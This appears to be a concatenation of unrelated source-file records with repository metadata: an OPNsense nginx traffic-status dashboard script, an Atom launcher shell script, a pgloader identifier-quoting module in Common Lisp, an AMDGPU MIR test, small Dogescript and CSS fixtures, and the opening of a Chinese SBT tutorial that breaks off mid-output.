const UpstreamModel = Backbone.Model.extend({
  idAttribute: 'uuid'
});
// Collection of configured upstreams fetched from the OPNsense settings API.
const UpstreamCollection = Backbone.Collection.extend({
  url: '/api/nginx/settings/searchupstream',
  model: UpstreamModel,
  // The search endpoint wraps its result set in a `rows` array.
  parse: function(response) {
    return response.rows;
  },
  // Map an nginx-internal zone name of the form "upstream<32 chars>" back to
  // the collection entry whose UUID matches: the 32-character remainder is
  // re-split into the standard 8-4-4-4-12 UUID groups.
  getByInternalName(name) {
    name = name.replace('upstream', ''); // remove prefix
    const len = [8, 4, 4, 4, 12];
    let idx = 0;
    const parts = [];
    len.forEach(function (l) {
      parts.push(name.substring(idx, idx + l));
      idx += l;
    });
    const uuid = parts.join("-");
    return this.get(uuid);
  }
});
// Fetch the upstream list once at page load so zone names can be replaced by
// their user-visible descriptions when rendering.
const uc = new UpstreamCollection();
uc.fetch();
// Endpoint serving the vhost_traffic_status JSON document.
const vtsStatusURI = "/api/nginx/service/vts";
// Default polling interval in ms, and the handle of the active timer.
let vtsUpdateInterval = 1000, vtsUpdate;
// Section titles (localized server-side by Volt) and the element ids used
// for each rendered zone table.
const vtsStatusVars = {
  titles: {
    main:"{{ lang._('Server main') }}",
    server:"{{ lang._('Server zones') }}",
    filter:"{{ lang._('Filters') }}",
    upstream:"{{ lang._('Upstreams') }}",
    cache:"{{ lang._('Caches') }}"
  },
  ids: {
    main:"mainZones",
    server:"serverZones",
    filter:"filterZones",
    upstream:"upstreamZones",
    cache:"cacheZones"
  }
};
// Shared DataPoint instance used to derive per-second rates between polls.
const aPs = new DataPoint();
// Format a millisecond duration for display:
//   < 1s          -> "123ms"
//   < 1min        -> "1.50s" (hundredths, no zero padding)
//   otherwise     -> "1d 2h 3m 4s", omitting leading zero units
function formatTime(msec) {
  const SECOND = 1000;
  const MINUTE = 60 * SECOND;
  const HOUR = 60 * MINUTE;
  const DAY = 24 * HOUR;
  if (msec < SECOND) {
    return msec + 'ms';
  }
  if (msec < MINUTE) {
    return Math.floor(msec / SECOND) + '.' + Math.floor((msec % SECOND) / 10) + 's';
  }
  const days = Math.floor(msec / DAY);
  const hours = Math.floor((msec % DAY) / HOUR);
  const minutes = Math.floor((msec % HOUR) / MINUTE);
  const seconds = Math.floor((msec % MINUTE) / SECOND);
  let out = '';
  if (days) {
    out += days + 'd ';
  }
  if (days || hours) {
    out += hours + 'h ';
  }
  if (days || hours || minutes) {
    out += minutes + 'm ';
  }
  return out + seconds + 's';
}
// Render an upstream peer's availability from its backup (b) and down (d)
// flags: down wins, otherwise backup, otherwise up.
function formatAvailability(b, d) {
  if (d) {
    return "down";
  }
  return b ? "backup" : "up";
}
// Wrap `v` in an HTML element described by `t`. `t` may carry attributes
// (e.g. 'th rowspan="2"'); only the bare tag name before the first space is
// used for the closing tag.
function htmlTag(t, v) {
  const tagName = t.split(' ')[0];
  return `<${t}>${v}</${tagName}>`;
}
// Apply htmlTag to a single value, or to each element of an array with the
// results concatenated.
function aHe(t, v) {
  if (Array.isArray(v)) {
    return v.map(function (item) {
      return htmlTag(t, item);
    }).join('');
  }
  return htmlTag(t, v);
}
// Build the two-row <thead> for the server/filter zone tables. When `cache`
// is true an extra nine-column cache-status group is appended to match the
// cache columns emitted by templateServerZone.
function templateServerHeader(cache) {
  const heads = [];
  // first row: column-group titles spanning the detail columns below
  heads[0] = aHe('th rowspan="2"', "{{ lang._('Zone') }}") +
    aHe('th colspan="3"', "{{ lang._('Requests') }}") +
    aHe('th colspan="6"', "{{ lang._('Responses') }}") +
    aHe('th colspan="4"', "{{ lang._('Traffic') }}");
  if (cache) {
    heads[0] += aHe('th colspan="9"', "{{ lang._('Cache') }}");
  }
  // second row: one <th> per detail column
  heads[1] = aHe('th', [ "{{ lang._('Total') }}",
    "{{ lang._('Req/s') }}",
    "{{ lang._('Time') }}",
    "{{ lang._('1xx') }}",
    "{{ lang._('2xx') }}",
    "{{ lang._('3xx') }}",
    "{{ lang._('4xx') }}",
    "{{ lang._('5xx') }}",
    "{{ lang._('Total') }}",
    "{{ lang._('Sent') }}",
    "{{ lang._('Rcvd') }}",
    "{{ lang._('Sent/s') }}",
    "{{ lang._('Rcvd/s') }}" ]);
  if (cache) {
    heads[1] += aHe('th', [ "{{ lang._('Miss') }}",
      "{{ lang._('Bypass') }}",
      "{{ lang._('Expired') }}",
      "{{ lang._('Stale') }}",
      "{{ lang._('Updating') }}",
      "{{ lang._('Revalidated') }}",
      "{{ lang._('Hit') }}",
      "{{ lang._('Scarce') }}",
      "{{ lang._('Total') }}" ]);
  }
  return aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
}
// Build the two-row <thead> for the upstream tables: per-peer identity and
// configuration columns, then request/response/traffic counters matching
// the cells emitted by templateUpstreamZone.
function templateUpstreamHeader() {
  const heads = [];
  // first row: rowspan cells for the peer columns, group titles for the rest
  heads[0] = aHe('th rowspan="2"', "{{ lang._('Server') }}") +
    aHe('th rowspan="2"', "{{ lang._('State') }}") +
    aHe('th rowspan="2"', "{{ lang._('Response Time') }}") +
    aHe('th rowspan="2"', "{{ lang._('Weight') }}") +
    aHe('th rowspan="2"', "{{ lang._('MaxFails') }}") +
    aHe('th rowspan="2"', "{{ lang._('FailTimeout') }}") +
    aHe('th colspan="3"', "{{ lang._('Requests') }}") +
    aHe('th colspan="6"', "{{ lang._('Responses') }}") +
    aHe('th colspan="4"', "{{ lang._('Traffic') }}");
  // second row: one <th> per detail column
  heads[1] = aHe('th', [ "{{ lang._('Total') }}",
    "{{ lang._('Req/s') }}",
    "{{ lang._('Time') }}",
    "{{ lang._('1xx') }}",
    "{{ lang._('2xx') }}",
    "{{ lang._('3xx') }}",
    "{{ lang._('4xx') }}",
    "{{ lang._('5xx') }}",
    "{{ lang._('Total') }}",
    "{{ lang._('Sent') }}",
    "{{ lang._('Rcvd') }}",
    "{{ lang._('Sent/s') }}",
    "{{ lang._('Rcvd/s') }}" ]);
  return aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
}
// Build the two-row <thead> for the cache zones table: zone name, cache
// size, traffic counters and the nine cache-status counters.
// Fixes vs. original: `var` -> `const` for consistency with the sibling
// header builders, and the 'Zone' label now goes through lang._() like
// every other header string instead of being hard-coded English.
function templateCacheHeader() {
  const heads = [];
  // first row: column-group titles
  heads[0] = aHe('th rowspan="2"', "{{ lang._('Zone') }}") +
    aHe('th colspan="2"', "{{ lang._('Size') }}") +
    aHe('th colspan="4"', "{{ lang._('Traffic') }}") +
    aHe('th colspan="9"', "{{ lang._('Cache') }}");
  // second row: one <th> per detail column
  heads[1] = aHe('th', [ "{{ lang._('Capacity') }}",
    "{{ lang._('Used') }}",
    "{{ lang._('Sent') }}",
    "{{ lang._('Rcvd') }}",
    "{{ lang._('Sent/s') }}",
    "{{ lang._('Rcvd/s') }}",
    "{{ lang._('Miss') }}",
    "{{ lang._('Bypass') }}",
    "{{ lang._('Expired') }}",
    "{{ lang._('Stale') }}",
    "{{ lang._('Updating') }}",
    "{{ lang._('Revalidated') }}",
    "{{ lang._('Hit') }}",
    "{{ lang._('Scarce') }}",
    "{{ lang._('Total') }}" ]);
  return aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
}
// Render the "Server main" section: a single-row table with host identity,
// uptime, connection counters, request totals/rates and shared-memory use.
// `it` is the full VTS status JSON document.
function templateMainZone(it) {
  let o, head, body;
  const heads = [];
  const bodys = [];
  heads[0] = aHe('th rowspan="2"', "{{ lang._('Host') }}") +
    aHe('th rowspan="2"', "{{ lang._('Version') }}") +
    aHe('th rowspan="2"', "{{ lang._('Uptime') }}") +
    aHe('th colspan="4"', "{{ lang._('Connections') }}") +
    aHe('th colspan="4"', "{{ lang._('Requests') }}") +
    aHe('th colspan="4"', "{{ lang._('Shared memory') }}");
  heads[1] = aHe('th', [ "{{ lang._('active') }}",
    "{{ lang._('reading') }}",
    "{{ lang._('writing') }}",
    "{{ lang._('waiting') }}",
    "{{ lang._('accepted') }}",
    "{{ lang._('handled') }}",
    "{{ lang._('Total') }}",
    "{{ lang._('Req/s') }}",
    "{{ lang._('name') }}",
    "{{ lang._('max Size') }}",
    "{{ lang._('used Size') }}",
    "{{ lang._('used Node') }}" ]);
  head = aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
  // uptime = time of this sample minus nginx start time; Req/s is derived
  // from successive request totals via the shared DataPoint instance
  bodys[0] = aHe('td', [ aHe('strong', it.hostName), it.nginxVersion, formatTime(it.nowMsec - it.loadMsec),
    it.connections.active, it.connections.reading, it.connections.writing,
    it.connections.waiting, it.connections.accepted, it.connections.handled,
    it.connections.requests, aPs.getValue('main.connections.requests', it.connections.requests),
    aHe('strong', it.sharedZones.name), byteFormat(it.sharedZones.maxSize), byteFormat(it.sharedZones.usedSize),
    it.sharedZones.usedNode]);
  body = aHe('tbody', aHe('tr', bodys[0]));
  o = aHe('h2', vtsStatusVars.titles.main) + aHe('table', `${head}${body}`);
  o = aHe(`div id="${vtsStatusVars.ids.main}"`, o);
  return o;
}
// Render <tr> rows for one group of server/filter zones.
// `filter`: object mapping zone name -> zone stats; `group`: group key, also
// used for country-flag detection; `id`: section id; `group` and `id`
// together namespace the per-second rate counters. When `cache` is true the
// cache-status columns are appended (must match templateServerHeader).
function templateServerZone(filter, group, id, cache) {
  let n = 0, s, o = '';
  for(const name in filter) {
    if (filter.hasOwnProperty(name)) {
      const zone = filter[name];
      // unique key so DataPoint rate tracking doesn't collide across tables
      const uniq = `${id}.${group}.${name}`;
      let clas = '';
      let flag = '';
      let responseCount = 0;
      let responseTotal = 0;
      let cacheCount = 0;
      let cacheTotal = 0;
      // zebra-stripe every other row
      clas = (n++ % 2) ? 'odd' : '';
      // two-letter zone names inside "country" groups get a flag icon
      flag = (group.indexOf("country") !== -1 && name.length === 2)
        ? `<img class="flag flag-${name.toLowerCase()}" alt="flag ${name.toLowerCase()}" />`
        : '';
      // request totals are widened with the server-side overflow counters
      // (counter wraps are reported via overCounts)
      s = aHe('th', flag + name) +
        aHe('td', [(zone.requestCounter + zone.overCounts['maxIntegerSize'] * zone.overCounts['requestCounter']),
          aPs.getValue(`${uniq}.requestCounter`, zone.requestCounter), formatTime(zone.requestMsec)
        ]);
      // the first five response keys are the 1xx..5xx status classes
      for(const code in zone.responses) {
        if (!zone.responses.hasOwnProperty(code)) continue;
        responseCount = zone.responses[code] + zone.overCounts['maxIntegerSize'] * zone.overCounts[code];
        responseTotal += responseCount;
        s += aHe('td', responseCount);
        // stop after 5xx: any remaining keys are cache counters handled below
        if(code === '5xx') break;
      }
      s += aHe('td', [responseTotal,
        byteFormat(zone.outBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['outBytes']),
        byteFormat(zone.inBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['inBytes']),
        byteFormat(aPs.getValue(`${uniq}.outBytes`, zone.outBytes)),
        byteFormat(aPs.getValue(`${uniq}.inBytes`, zone.inBytes))
      ]);
      if (cache) {
        let i = 0;
        // second pass: skip the five status-class entries, emit cache counters.
        // NOTE(review): i++ happens before the hasOwnProperty check, so an
        // enumerable inherited property would consume a skip slot — harmless
        // for JSON-parsed objects, but confirm.
        for(const code in zone.responses) {
          if(i++ < 5) continue;
          if (!zone.responses.hasOwnProperty(code)) continue;
          cacheCount = (zone.responses[code] + zone.overCounts['maxIntegerSize'] * zone.overCounts[code]);
          cacheTotal += cacheCount;
          s += aHe('td', cacheCount);
        }
        s += aHe('td', cacheTotal);
      }
      o += aHe(`tr class="${clas}"`, s);
    }
  }
  return o;
}
// Render <tr> rows for one upstream group. `filter` is the array of peer
// objects for the group; `group` and `id` namespace the per-second rate
// counters tracked by the shared DataPoint instance.
function templateUpstreamZone(filter, group, id) {
  let n = 0;
  let s = '';
  let o = '';
  while (n < filter.length) {
    const peer = filter[n];
    // unique key so rate tracking doesn't collide across peers/groups
    const uniq = `${id}.${group}.${peer.server}`;
    let clas = '';
    let responseCount = 0;
    let responseTotal = 0;
    // zebra-stripe every other row (n is advanced here as loop counter too)
    clas = (n++ % 2) ? 'odd' : '';
    // peer identity, availability, config, and overflow-widened request totals
    s = aHe('th', peer.server) +
      aHe('td', [formatAvailability(peer.backup, peer.down), formatTime(peer.responseMsec),
        peer.weight, peer.maxFails, peer.failTimeout,
        (peer.requestCounter + peer.overCounts['maxIntegerSize'] * peer.overCounts['requestCounter']),
        aPs.getValue(`${uniq}.requestCounter`, peer.requestCounter),
        formatTime(peer.requestMsec)
      ]);
    // one cell per response status class, widened with overflow counters
    for(const code in peer.responses) {
      if (peer.responses.hasOwnProperty(code)) {
        responseCount = peer.responses[code] + peer.overCounts['maxIntegerSize'] * peer.overCounts[code];
        responseTotal += responseCount;
        s += aHe('td', responseCount);
      }
    }
    // totals plus absolute and per-second traffic figures
    s += aHe('td', [responseTotal,
      byteFormat(peer.outBytes + peer.overCounts['maxIntegerSize'] * peer.overCounts['outBytes']),
      byteFormat(peer.inBytes + peer.overCounts['maxIntegerSize'] * peer.overCounts['inBytes']),
      byteFormat(aPs.getValue(`${uniq}.outBytes`, peer.outBytes)),
      byteFormat(aPs.getValue(`${uniq}.inBytes`, peer.inBytes))
    ]);
    o += aHe(`tr class="${clas}"`, s);
  }
  return o;
}
// Render <tr> rows for the cache zones table. `filter` maps cache zone name
// -> stats; `group` and `id` namespace the per-second rate counters.
function templateCacheZone(filter, group, id) {
  let n = 0;
  let s;
  let o = '';
  for(const name in filter) {
    if (filter.hasOwnProperty(name)) {
      const zone = filter[name];
      // unique key so rate tracking doesn't collide across zones/sections
      const uniq = `${id}.${group}.${name}`;
      let clas = '';
      let cacheCount = 0;
      let cacheTotal = 0;
      // zebra-stripe every other row
      clas = (n++ % 2) ? 'odd' : '';
      // capacity/usage plus absolute and per-second traffic figures
      s = aHe('th', name) +
        aHe('td', [byteFormat(zone.maxSize),
          byteFormat(zone.usedSize),
          byteFormat(zone.outBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['outBytes']),
          byteFormat(zone.inBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['inBytes']),
          byteFormat(aPs.getValue(`${uniq}.outBytes`, zone.outBytes)),
          byteFormat(aPs.getValue(`${uniq}.inBytes`, zone.inBytes))
        ]);
      // one cell per cache-status counter, widened with overflow counters
      for (const code in zone.responses) {
        if (zone.responses.hasOwnProperty(code)) {
          cacheCount = zone.responses[code] + zone.overCounts['maxIntegerSize'] * zone.overCounts[code];
          cacheTotal += cacheCount;
          s += aHe('td', cacheCount);
        }
      }
      s += aHe('td', cacheTotal);
      o += aHe(`tr class="${clas}"`, s);
    }
  }
  return o;
}
// Decide whether the cache columns should be rendered. The "*" server zone
// aggregates all zones; when it reports more than the five standard status
// classes (1xx..5xx), the extra response keys are cache counters.
// NOTE(review): returning true when the "*" zone is absent looks like a
// deliberate fail-open (show cache columns when we cannot tell) — confirm
// against the nginx VTS JSON format.
function haveCache(it) {
  const aggregate = it.serverZones["*"];
  if (typeof aggregate == "undefined") {
    return true;
  }
  return Object.keys(aggregate.responses).length > 5;
}
// Render the whole dashboard from one VTS status document `it`: main zone,
// server zones, then (when present in the document) filter, upstream and
// cache sections. Also advances the shared rate tracker for this poll.
function template(it) {
  // record poll time first so all getValue() calls below see a fresh period
  aPs.refresh(it.nowMsec);
  const bodys = [];
  let tmp = '';
  let out, head, body, cache;
  /* main */
  out = templateMainZone(it);
  /* serverZones */
  // cache applies to both the server and filter sections
  cache = haveCache(it);
  head = templateServerHeader(cache);
  bodys[0] = templateServerZone(it.serverZones, 'server', vtsStatusVars.ids.server, cache);
  body = aHe('tbody', bodys[0]);
  out += aHe(`div id="${vtsStatusVars.ids.server}"`, aHe('h2', vtsStatusVars.titles.server) + aHe('table', head + body));
  /* filterZones */
  // optional sections are only rendered when the JSON document carries them
  if (vtsStatusVars.ids.filter in it) {
    tmp = '';
    for (const group in it.filterZones) {
      if (it.filterZones.hasOwnProperty(group)) {
        const filter = it.filterZones[group];
        head = templateServerHeader(cache);
        bodys[0] = templateServerZone(filter, group, vtsStatusVars.ids.filter, cache);
        body = aHe('tbody', bodys[0]);
        tmp += aHe('h3', group) + aHe('table', head + body);
      }
    }
    out += aHe(`div id="${vtsStatusVars.ids.filter}"`, aHe('h2', vtsStatusVars.titles.filter) + tmp);
  }
  /* upstreamZones */
  if (vtsStatusVars.ids.upstream in it) {
    tmp = '';
    for (let group in it.upstreamZones) {
      if (it.upstreamZones.hasOwnProperty(group)) {
        const filter = it.upstreamZones[group];
        head = templateUpstreamHeader();
        bodys[0] = templateUpstreamZone(filter, group, vtsStatusVars.ids.upstream);
        body = aHe('tbody', bodys[0]);
        // replace the internal upstream<uuid> name with the user-supplied
        // description from the settings API, when one exists
        let g2 = uc.getByInternalName(group);
        if (g2) {
          if (g2.get('description')) {
            group = g2.get('description');
          }
        }
        tmp += aHe('h3', group) + aHe('table', head + body);
      }
    }
    out += aHe(`div id="${vtsStatusVars.ids.upstream}"`, aHe('h2', vtsStatusVars.titles.upstream) + tmp);
  }
  /* cacheZones */
  if (vtsStatusVars.ids.cache in it) {
    head = templateCacheHeader();
    bodys[0] = templateCacheZone(it.cacheZones, 'cache', vtsStatusVars.ids.cache);
    body = aHe('tbody', bodys[0]);
    out += aHe(`div id="${vtsStatusVars.ids.cache}"`,
      aHe('h2', vtsStatusVars.titles.cache) + aHe('table', head + body));
  }
  return out;
}
// Container element the rendered status tables are injected into.
const monitor = $('#monitor');
// Poll the VTS endpoint once and re-render the whole dashboard.
function vtsGetData() {
  jQuery.get(vtsStatusURI).done(function (d) {
    monitor.html(template(d));
  });
}
// (Re)start the polling timer with a new period in milliseconds.
function vtsSetInterval(msec) {
  clearInterval(vtsUpdate);
  vtsUpdate = setInterval(vtsGetData, msec);
}
// The refresh <select> holds whole seconds; convert to ms on change.
$('#refresh').on('change', function () {
  vtsSetInterval($(this).val() * 1000);
});
// Initial render, then begin polling at the default 1s interval.
vtsGetData();
vtsSetInterval(vtsUpdateInterval);
</script>
| Volt | 4 | ccesario/plugins | www/nginx/src/opnsense/mvc/app/views/OPNsense/Nginx/vts.volt | [
"BSD-2-Clause"
] |
;;;
;;; Manage PostgreSQL specific quoting of identifiers.
;;;
;;; We use this facility as early as possible (in schema-structs), so we
;;; need those bits of code in utils/ rather than pgsql/.
;;;
(in-package :pgloader.quoting)
(defun apply-identifier-case (identifier)
  "Return given IDENTIFIER with CASE handled to be PostgreSQL compatible.
   The effective policy starts from the special variable *IDENTIFIER-CASE*
   but is overridden to :none for already-quoted input and to :quote for
   names that are not legal bare SQL identifiers or that collide with a
   reserved keyword."
  ;; lowercase-identifier is the downcased, sanitized spelling used both for
  ;; the reserved-keyword lookup and as the :downcase result
  (let* ((lowercase-identifier (cl-ppcre:regex-replace-all
                                "[^a-zA-Z0-9.]" (string-downcase identifier) "_"))
         (*identifier-case*
          ;; we might need to force to :quote in some cases
          ;;
          ;; http://www.postgresql.org/docs/9.1/static/sql-syntax-lexical.html
          ;;
          ;; SQL identifiers and key words must begin with a letter (a-z, but
          ;; also letters with diacritical marks and non-Latin letters) or an
          ;; underscore (_).
          (cond ((quoted-p identifier)
                 ;; already explicitly quoted by the user: leave it alone
                 :none)
                ((not (cl-ppcre:scan "^[A-Za-z_][A-Za-z0-9_$]*$" identifier))
                 ;; not a legal bare SQL identifier: quoting is mandatory
                 :quote)
                ((member lowercase-identifier *pgsql-reserved-keywords*
                         :test #'string=)
                 (progn
                   ;; we need to both downcase and quote here
                   (when (eq :downcase *identifier-case*)
                     (setf identifier lowercase-identifier))
                   :quote))

                ;; in other cases follow user directive
                (t *identifier-case*))))
    ;; apply the (possibly overridden) policy
    ;; NOTE(review): the :quote branch first doubles embedded double quotes
    ;; (SQL style) and then prints with ~s, which escapes them again with
    ;; backslashes in the printed representation — confirm the intended
    ;; output format for identifiers containing quote characters.
    (ecase *identifier-case*
      (:snake_case (camelCase-to-colname identifier))
      (:downcase lowercase-identifier)
      (:quote (format nil "~s"
                      (cl-ppcre:regex-replace-all "\"" identifier "\"\"")))
      (:none identifier))))
(defun quoted-p (s &optional (quote-char #\"))
  "Return a true value when S is a string of length at least 2 whose first
   and last characters are both QUOTE-CHAR. NIL is treated as quoted by
   this predicate."
  (if (null s)
      t
      (let ((len (length s)))
        (when (> len 1)
          (and (eq (char s 0) quote-char)
               (eq (char s (1- len)) quote-char))))))
(defun ensure-unquoted (identifier &optional (quote-char #\"))
  "Strip one surrounding layer of QUOTE-CHAR from IDENTIFIER when present;
   NIL and strings too short to be quoted are returned unchanged."
  (cond ((null identifier) nil)
        ((< (length identifier) 2) identifier)
        ((quoted-p identifier quote-char)
         ;; when the table name comes from the user (e.g. in the
         ;; load file) then we might have to unquote it: the
         ;; PostgreSQL catalogs does not store object names in
         ;; their quoted form.
         (subseq identifier 1 (1- (length identifier))))
        (t identifier)))
(defun ensure-quoted (value &optional (quote-char #\"))
  "Return VALUE unchanged when it already satisfies QUOTED-P, otherwise a
   fresh string with QUOTE-CHAR prepended and appended."
  (cond ((quoted-p value quote-char) value)
        (t (format nil "~c~a~c" quote-char value quote-char))))
(defun build-identifier (sep &rest parts)
  "Concatenate PARTS into a PostgreSQL identifier, with SEP in between
  parts. That's useful for creating an index name from a table's oid and name."
  (apply-identifier-case
   (apply #'concatenate
          'string
          ;; each part is stringified when necessary and unquoted first, then
          ;; SEP is interleaved between consecutive parts (never appended)
          (loop :for (part . more?) :on parts
             :collect (ensure-unquoted (typecase part
                                         (string part)
                                         (t (princ-to-string part))))
             :when more? :collect sep))))
;;;
;;; Camel Case converter
;;;
(defun camelCase-to-colname (string)
  "Transform input STRING into a suitable column name.
    lahmanID lahman_id
    playerID player_id
    birthYear birth_year"
  (coerce
   (loop
      ;; a new word starts at an upper-case character that is not the first
      ;; character and does not follow another upper-case character (so runs
      ;; of capitals like \"ID\" stay one word); insert #\_ before it and
      ;; downcase every character on the way out
      :for first := t :then nil
      :for char :across string
      :for previous-upper-p := nil :then char-upper-p
      :for char-upper-p := (and (alpha-char-p char)
                                (eq char (char-upcase char)))
      :for new-word := (and (not first) char-upper-p (not previous-upper-p))
      :when (and new-word (not (char= char #\_))) :collect #\_
      :collect (char-downcase char))
   'string))
| Common Lisp | 5 | eveoh/pgloader | src/utils/quoting.lisp | [
"PostgreSQL"
] |
very multiObj is obj
test: ['wow']
wow
| Dogescript | 0 | erinkeith/dogescript | test/spec/var/very-obj-singleprop/source.djs | [
"MIT"
] |
# Triple, no DOT, operator
PREFIX : <http://example.org/ns#>
SELECT *
{ :p :q :r OPTIONAL { :a :b :c } }
| SPARQL | 3 | alpano-unibz/ontop | test/sparql-compliance/src/test/resources/testcases-dawg/data-r2/syntax-sparql1/syntax-struct-03.rq | [
"Apache-2.0"
] |
#!/bin/bash

# This script wraps the `Atom` binary, allowing the `chromedriver` server to
# execute it with positional arguments and environment variables. `chromedriver`
# only allows 'switches' to be specified when starting a browser, not positional
# arguments, so this script accepts the following special switches:
#
# * `atom-path`: The path to the `Atom` binary.
# * `atom-args`: A space-separated list of positional arguments to pass to Atom.
# * `atom-env`: A space-separated list of key=value pairs representing environment
#   variables to set for Atom.
#
# Any other switches will be passed through to `Atom`.

atom_path=""
atom_switches=()
atom_args=()

for arg in "$@"; do
  case $arg in
    --atom-path=*)
      atom_path="${arg#*=}"
      ;;
    --atom-args=*)
      atom_arg_string="${arg#*=}"
      # Intentionally unquoted: split the value on whitespace into
      # individual positional arguments.
      for atom_arg in $atom_arg_string; do
        atom_args+=("$atom_arg")
      done
      ;;
    --atom-env=*)
      atom_env_string="${arg#*=}"
      for atom_env_pair in $atom_env_string; do
        # Quoted so each key=value pair is exported verbatim instead of
        # being subject to glob expansion.
        export "$atom_env_pair"
      done
      ;;
    *)
      atom_switches+=("$arg")
      ;;
  esac
done

echo "Launching Atom" >&2
echo "${atom_path}" "${atom_args[@]}" "${atom_switches[@]}" >&2
# Every expansion is quoted so arguments containing glob characters (and an
# atom_path containing spaces) are passed to Atom untouched; empty arrays
# still expand to zero words.
exec "${atom_path}" "${atom_args[@]}" "${atom_switches[@]}"
| Shell | 4 | pyrolabs/atom | spec/integration/helpers/atom-launcher.sh | [
"MIT"
] |
# RUN: llc -o - %s -mtriple=amdgcn--amdhsa -verify-machineinstrs -run-pass=greedy,virtregrewriter | FileCheck %s
--- |
  define amdgpu_kernel void @func0() {
    ret void
  }
...
---
# We should not detect any interference between %0/%1 here and only allocate
# sgpr0-sgpr3.
#
# %0 defines/uses only lanes sub0 and sub3 of an sgpr_128 tuple while %1
# uses only sub1 and sub2, so subregister-aware liveness must let both
# virtual registers share a single physical tuple; the CHECK lines pin the
# expected lane assignment.
#
# CHECK-LABEL: func0
# CHECK: S_NOP 0, implicit-def renamable $sgpr0
# CHECK: S_NOP 0, implicit-def renamable $sgpr3
# CHECK: S_NOP 0, implicit-def renamable $sgpr1
# CHECK: S_NOP 0, implicit-def renamable $sgpr2
# CHECK: S_NOP 0, implicit renamable $sgpr0, implicit renamable $sgpr3
# CHECK: S_NOP 0, implicit renamable $sgpr1, implicit renamable $sgpr2
name: func0
body: |
  bb.0:
    S_NOP 0, implicit-def undef %0.sub0 : sgpr_128
    S_NOP 0, implicit-def %0.sub3
    S_NOP 0, implicit-def undef %1.sub1 : sgpr_128
    S_NOP 0, implicit-def %1.sub2
    S_NOP 0, implicit %0.sub0, implicit %0.sub3
    S_NOP 0, implicit %1.sub1, implicit %1.sub2
...
| Mirah | 3 | medismailben/llvm-project | llvm/test/CodeGen/AMDGPU/subreg_interference.mir | [
"Apache-2.0"
] |
a { value: '\1' } | CSS | 0 | kitsonk/swc | css/parser/tests/fixture/esbuild/misc/GI1rffTXev-78n9ei_53wQ/input.css | [
"Apache-2.0",
"MIT"
] |
---
prev: advanced-types.textile
next: coll2.textile
title: 简单构建工具
layout: post
---
这堂课将概述SBT!具体议题包括:
* 创建一个SBT项目
* 基本命令
* sbt控制台
* 连续命令执行
* 自定义你的项目
* 自定义命令
* 快速浏览SBT资源(如果时间允许)
h2. 关于SBT
SBT是一个现代化的构建工具。虽然它由Scala编写并提供了很多Scala便利,但它是一个通用的构建工具。
h2. 为什么选择SBT?
* 明智的依赖管理
** 使用Ivy做依赖管理
** “只在请求时更新”的模型
* 对创建任务全面的Scala语言支持
* 连续执行命令
* 在项目上下文内启动解释器
h2. 入门
*译注* 最新的SBT安装方式请参考 <a href="https://www.scala-sbt.org/release/docs/Getting-Started/Setup.html">scala-sbt的文档</a>
* 下载jar包 <a href="https://code.google.com/p/simple-build-tool/downloads/list">地址 </a>
* 创建一个调用这个jar的SBT shell脚本,例如
<pre>
java -Xmx512M -jar sbt-launch.jar "$@"
</pre>
* 确保它是可执行的,并在你的path下
* 运行sbt来创建项目
<pre>
[local ~/projects]$ sbt
Project does not exist, create new project? (y/N/s) y
Name: sample
Organization: com.twitter
Version [1.0]: 1.0-SNAPSHOT
Scala version [2.7.7]: 2.8.1
sbt version [0.7.4]:
Getting Scala 2.7.7 ...
:: retrieving :: org.scala-tools.sbt#boot-scala
confs: [default]
2 artifacts copied, 0 already retrieved (9911kB/221ms)
Getting org.scala-tools.sbt sbt_2.7.7 0.7.4 ...
:: retrieving :: org.scala-tools.sbt#boot-app
confs: [default]
15 artifacts copied, 0 already retrieved (4096kB/167ms)
[success] Successfully initialized directory structure.
Getting Scala 2.8.1 ...
:: retrieving :: org.scala-tools.sbt#boot-scala
confs: [default]
2 artifacts copied, 0 already retrieved (15118kB/386ms)
[info] Building project sample 1.0-SNAPSHOT against Scala 2.8.1
[info] using sbt.DefaultProject with sbt 0.7.4 and Scala 2.7.7
>
</pre>
可以看到它已经以较好的形式创建了项目的快照版本。
h2. 项目布局
* 项目 - 项目定义文件
** project/build/<yourproject>.scala - 主项目定义文件
** project/build.properties - 项目、sbt和Scala版本定义
* src/main - 你的应用程序代码出现在这里,在子目录表明代码的语言(如src/main/scala, src/main/java)
* src/main/resources - 你想要添加到jar包中的静态文件(如日志配置)
* src/test - 就像src/main,不过是对测试
* lib_managed - 你的项目依赖的jar文件。由sbt update时填充
* target - 生成物的目标路径(如自动生成的thrift代码,类文件,jar包)
h2. 添加一些代码
我们将为简单的tweet消息创建一个简单的JSON解析器。将以下代码加在这个文件中
src/main/scala/com/twitter/sample/SimpleParser.scala
<pre>
package com.twitter.sample
case class SimpleParsed(id: Long, text: String)
class SimpleParser {
val tweetRegex = "\"id\":(.*),\"text\":\"(.*)\"".r
def parse(str: String) = {
tweetRegex.findFirstMatchIn(str) match {
case Some(m) => {
val id = str.substring(m.start(1), m.end(1)).toInt
val text = str.substring(m.start(2), m.end(2))
Some(SimpleParsed(id, text))
}
case _ => None
}
}
}
</pre>
这段代码丑陋并有bug,但应该能够编译通过。
h2. 在控制台中的测试
SBT既可以用作命令行脚本,也可以作为构建控制台。我们将主要利用它作为构建控制台,不过大多数命令可以作为参数传递给SBT独立运行,如
<pre>
sbt test
</pre>
需要注意如果一个命令需要参数,你需要使用引号包括住整个参数路径,例如
<pre>
sbt 'test-only com.twitter.sample.SampleSpec'
</pre>
这种方式很奇怪。
不管怎样,要开始我们的代码工作了,启动SBT吧
<pre>
[local ~/projects/sbt-sample]$ sbt
[info] Building project sample 1.0-SNAPSHOT against Scala 2.8.1
[info] using sbt.DefaultProject with sbt 0.7.4 and Scala 2.7.7
>
</pre>
SBT允许你启动一个Scala REPL并加载所有项目依赖。它会在启动控制台前编译项目的源代码,从而为我们提供一个快速测试解析器的工作台。
<pre>
> console
[info]
[info] == compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling main sources...
[info] Nothing to compile.
[info] Post-analysis: 3 classes.
[info] == compile ==
[info]
